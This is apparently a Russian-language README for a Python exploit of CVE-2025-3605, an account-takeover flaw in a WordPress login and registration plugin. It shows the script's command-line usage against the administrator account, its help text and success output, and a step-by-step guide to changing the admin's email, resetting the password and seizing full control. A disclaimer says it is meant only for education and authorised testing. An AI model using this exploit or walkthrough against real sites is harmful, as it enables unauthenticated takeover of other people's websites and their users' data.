
WordPress Frontend Login and Registration Blocks Plugin <= 1.0.7 уязвим для повышения привилегий
Плагин Frontend Login and Registration Blocks для WordPress (версии <= 1.0.7) уязвим к повышению привилегий через захват учётных записей.
Проблема возникает из-за того, что плагин не проверяет личность пользователя при обновлении конфиденциальных данных, таких как email, через функцию flr_blocks_user_settings_handle_ajax_callback().
✅ Воздействие:
Неаутентифицированный злоумышленник может изменить email администратора, запустить процесс «Забыли пароль» и сбросить пароль администратора, получив полный контроль.
Прилагаемый скрипт на Python автоматизирует процесс эксплуатации, обращаясь к уязвимой конечной точке AJAX:
/wp-admin/admin-ajax.php
Он обновляет email целевого пользователя (обычно user_id 1 для администратора) на email, контролируемый злоумышленником.
Имя файла: CVE-2025-3605.py
python CVE-2025-3605.py --url http://target-site/wordpress --user_id 1 --mail [email protected]
✅ Значения по умолчанию:
--user_id: 1 (администратор по умолчанию)--mail: [email protected]Чтобы увидеть справку, выполните:
python CVE-2025-3605.py --help
Вывод:
[+] Starting exploit script...
usage: a.py [-h] --url URL [--user_id USER_ID] [--mail MAIL]
Frontend Login and Registration Blocks Plugin <= 1.0.7 is vulnerable to Privilege Escalation # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
--url, -u URL Target URL, e.g., http://192.168.100.74:888/wordpress
--user_id, -id USER_ID
User ID to target (default: 1)
--mail, -mail MAIL Email to set (default: [email protected])
✅ Пример запуска:
python CVE-2025-3605.py -u http://192.168.100.74:888/wordpress -id 1 -mail [email protected]
✅ При успехе:
[+] Starting exploit script...
[+] Sending exploit to http:/target.com/wp-admin/admin-ajax.php/wp-admin/admin-ajax.php
[+] Exploit successful! Response: {"status":true,"message":"Operation has been completed successfully."}
[+] Final Step: Go to the Forgot Password page and reset the admin password using the new email!
Exploit By : Khaled_alenazi ( Nxploited )
❌ При неудаче:
[!] Exploit failed. HTTP Status: 400
[!] Response: 0
1️⃣ Перейдите по адресу:
http://target-site/wordpress/wp-login.php
2️⃣ Введите новый email, который вы указали ([email protected]).
3️⃣ Запросите сброс пароля.
4️⃣ Установите новый пароль.
5️⃣ Войдите как администратор и получите полный доступ.
Этот эксплойт и скрипт предоставляются только для образовательных целей и санкционированного тестирования.
Любое несанкционированное использование в системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным и неэтичным.
Автор: Khaled Alenazi (Nxploited)